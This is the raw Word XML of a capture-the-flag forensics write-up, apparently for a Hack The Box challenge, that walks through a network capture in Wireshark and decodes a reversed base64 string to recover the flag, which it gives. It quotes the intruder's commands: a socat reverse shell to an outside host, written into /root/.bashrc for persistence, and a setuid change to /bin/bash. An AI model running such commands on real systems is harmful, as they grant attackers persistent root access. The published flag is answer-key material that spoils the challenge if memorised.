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ECF2EB"/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</w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_gjdgxs" w:id="0"/>
      <w:bookmarkEnd w:id="0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 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Wrong Spooky Season</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000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</w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_1fob9te" w:id="1"/>
      <w:bookmarkEnd w:id="1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Challenge Description:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000003">
      <w:pPr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&amp;quot;I told them it was too soon and in the wrong season to deploy such a website, but they assured me that theming it properly would be enough to stop the ghosts from haunting us. I was wrong.&amp;quot; Now there is an internal breach in the `Spooky Network` and you need to find out what happened. Analyze the network traffic and find how the scary ghosts got in and what they did.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3znysh7" w:id="2"/>
      <w:bookmarkEnd w:id="2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Context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</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000005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720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Comfortaa SemiBold" w:cs="Comfortaa SemiBold" w:eastAsia="Comfortaa SemiBold" w:hAnsi="Comfortaa SemiBold"/>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_2et92p0" w:id="3"/>
      <w:bookmarkEnd w:id="3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Just analyze a Pcap file with wireshark then decode a base64 string for the Flag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tyjcwt" w:id="4"/>
      <w:bookmarkEnd w:id="4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Notes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Tools:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000008">
      <w:pPr>
        <w:pageBreakBefore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216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Wireshark Or A tool to analyze Pcap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3dy6vkm" w:id="5"/>
      <w:bookmarkEnd w:id="5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Challenge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First open and download the file then, filter it down with the wireshark filter options.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</w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5810250" cy="381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22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Comfortaa SemiBold" w:cs="Comfortaa SemiBold" w:eastAsia="Comfortaa SemiBold" w:hAnsi="Comfortaa SemiBold"/>
          <w:color w:val="000000"/>
          <w:u w:val="none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Looking at the Pcap we can rule–out HTTP packets as it is leading us towards TCP streams. The last HTTP packet shows just a TCP connection being made on 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‘192.168.1.180: 1337' using</w:t>
      </w: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 Socat.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Comfortaa SemiBold" w:cs="Comfortaa SemiBold" w:eastAsia="Comfortaa SemiBold" w:hAnsi="Comfortaa SemiBold"/>
          <w:color w:val="000000"/>
          <w:u w:val="none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Filtering the Pcap File down to just that shows a Tcp stream When we follow it we get this.</w:t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</w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3898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Looking at this we can tell that there is a strings encoded using base64 that has been flipped in reverse</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000010">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Comfortaa" w:cs="Comfortaa" w:eastAsia="Comfortaa" w:hAnsi="Comfortaa"/>
          <w:b w:val="1"/>
          <w:color w:val="0000ff"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="ededfb" w:val="clear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sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">“</w:t>
      </w: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b w:val="1"/>
          <w:color w:val="0000ff"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="ededfb" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo 'socat TCP:192.168.1.180:1337 EXEC:sh' &gt; /root/.bashrc &amp;&amp;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000011">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Comfortaa" w:cs="Comfortaa" w:eastAsia="Comfortaa" w:hAnsi="Comfortaa"/>
          <w:b w:val="1"/>
          <w:color w:val="0000ff"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="ededfb" w:val="clear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ff"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="ededfb" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> echo "==gC9FSI5tGMwA3cfRjd0o2Xz0GNjNjYfR3c1p2Xn5WMyBXNfRjd0o2eCRFS" |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000012">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Comfortaa SemiBold" w:cs="Comfortaa SemiBold" w:eastAsia="Comfortaa SemiBold" w:hAnsi="Comfortaa SemiBold"/>
          <w:color w:val="000000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ff"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="ededfb" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> rev &gt; /dev/null &amp;&amp; chmod +s /bin/bash ls -lha</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Comfortaa SemiBold" w:cs="Comfortaa SemiBold" w:eastAsia="Comfortaa SemiBold" w:hAnsi="Comfortaa SemiBold"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="ededfb" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Comfortaa SemiBold" w:cs="Comfortaa SemiBold" w:eastAsia="Comfortaa SemiBold" w:hAnsi="Comfortaa SemiBold"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">”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Decoding the string back to normal is pretty simple just need to reverse it then decode it, the command for this would look like:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000014">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Comfortaa SemiBold" w:cs="Comfortaa SemiBold" w:eastAsia="Comfortaa SemiBold" w:hAnsi="Comfortaa SemiBold"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="2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sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> “</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Comfortaa" w:cs="Comfortaa" w:eastAsia="Comfortaa" w:hAnsi="Comfortaa"/>
          <w:b w:val="1"/>
          <w:color w:val="00007f"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo "==gC9FSI5tGMwA3cfRjd0o2Xz0GNjNjYfR3c1p2Xn5WMyBXNfRjd0o2eCRFS" | rev | base64 -d</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Comfortaa SemiBold" w:cs="Comfortaa SemiBold" w:eastAsia="Comfortaa SemiBold" w:hAnsi="Comfortaa SemiBold"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">”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Executing this will give you the Flag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rFonts w:ascii="Comfortaa SemiBold" w:cs="Comfortaa SemiBold" w:eastAsia="Comfortaa SemiBold" w:hAnsi="Comfortaa SemiBold"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_1t3h5sf" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Comfortaa SemiBold" w:cs="Comfortaa SemiBold" w:eastAsia="Comfortaa SemiBold" w:hAnsi="Comfortaa SemiBold"/>
          <w:b w:val="0"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Flag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sz w:val="34"/>
          <w:szCs w:val="3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We get the flag : HTB{j4v4_5pr1ng_just_b3c4m3_j4v4_sp00ky!!}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 w:orient="portrait"/>
      <w:pgMar w:bottom="1077.1653543307089" w:top="1077.1653543307089" w:left="1440.0000000000002" w:right="1440.000000000000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mfortaa SemiBold">
    <w:embedRegular w:fontKey="{00000000-0000-0000-0000-000000000000}" r:id="rId1" w:subsetted="0"/>
    <w:embedBold w:fontKey="{00000000-0000-0000-0000-000000000000}" r:id="rId2" w:subsetted="0"/>
  </w:font>
  <w:font w:name="Playfair Display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La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Comfortaa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color w:val="b7b7b7"/>
        <w:sz w:val="12"/>
        <w:szCs w:val="12"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:color w:val="b7b7b7"/>
        <w:sz w:val="12"/>
        <w:szCs w:val="12"/>
        <w:vertAlign w:val="superscript"/>
      </w:rPr>
      <w:pict>
        <v:shape id="WordPictureWatermark1" style="position:absolute;width:1404.0pt;height:960.631574803149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7.png"/>
        </v:shape>
      </w:pict>
    </w:r>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:rtl w:val="0"/>
      </w:rPr>
    </w:r>
  </w:p>
  <w:tbl>
    <w:tblPr>
      <w:tblStyle w:val="Table1"/>
      <w:tblW w:w="12660.0" w:type="dxa"/>
      <w:jc w:val="left"/>
      <w:tblInd w:w="-1875.0" w:type="dxa"/>
      <w:tblLayout w:type="fixed"/>
      <w:tblLook w:val="0600"/>
    </w:tblPr>
    <w:tblGrid>
      <w:gridCol w:w="4365"/>
      <w:gridCol w:w="4710"/>
      <w:gridCol w:w="3585"/>
      <w:tblGridChange w:id="0">
        <w:tblGrid>
          <w:gridCol w:w="4365"/>
          <w:gridCol w:w="4710"/>
          <w:gridCol w:w="3585"/>
        </w:tblGrid>
      </w:tblGridChange>
    </w:tblGrid>
    <w:tr>
      <w:trPr>
        <w:cantSplit w:val="0"/>
        <w:trHeight w:val="990" w:hRule="atLeast"/>
        <w:tblHeader w:val="0"/>
      </w:trPr>
      <w:tc>
        <w:tcPr>
          <w:gridSpan w:val="2"/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1A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710" w:right="0" w:firstLine="0"/>
            <w:rPr>
              <w:color w:val="ffffff"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
          <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_4d34og8" w:id="7"/>
          <w:bookmarkEnd w:id="7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1C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b w:val="1"/>
              <w:color w:val="ffffff"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
          <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_2s8eyo1" w:id="8"/>
          <w:bookmarkEnd w:id="8"/>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:b w:val="1"/>
              <w:color w:val="ffffff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1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sz w:val="12"/>
        <w:szCs w:val="1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466725</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>3739314</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="3011182" cy="2483247"/>
          <wp:effectExtent b="0" l="0" r="0" t="0"/>
          <wp:wrapNone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11182" cy="248324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828675</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>6647498</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="2538175" cy="2187692"/>
          <wp:effectExtent b="0" l="0" r="0" t="0"/>
          <wp:wrapNone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538175" cy="218769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76201</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>2525648</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="2700338" cy="2231285"/>
          <wp:effectExtent b="0" l="0" r="0" t="0"/>
          <wp:wrapNone/>
          <wp:docPr id="1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00338" cy="223128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pict>
        <v:shape id="WordPictureWatermark2" style="position:absolute;width:1404.0pt;height:960.6315748031495pt;rotation:0;z-index:-503316481;mso-position-horizontal-relative:margin;mso-position-horizontal:absolute;margin-left:-463.5pt;mso-position-vertical-relative:margin;mso-position-vertical:absolute;margin-top:-108.23322834645668pt;" alt="" type="#_x0000_t75">
          <v:imagedata blacklevel="22938f" cropbottom="0f" cropleft="0f" cropright="0f" croptop="0f" gain="19661f" r:id="rId1" o:title="image5.jpg"/>
        </v:shape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color w:val="666666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SemiBold-regular.ttf"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/ComfortaaSemiBold-bold.ttf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/PlayfairDisplay-regular.ttf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/PlayfairDisplay-bold.ttf"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Comfortaa-regular.ttf"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Lato-boldItalic.ttf"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Comfortaa-bold.ttf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Lato-italic.ttf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/PlayfairDisplay-italic.ttf"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/PlayfairDisplay-boldItalic.ttf"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Lato-regular.ttf"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Lat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3.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6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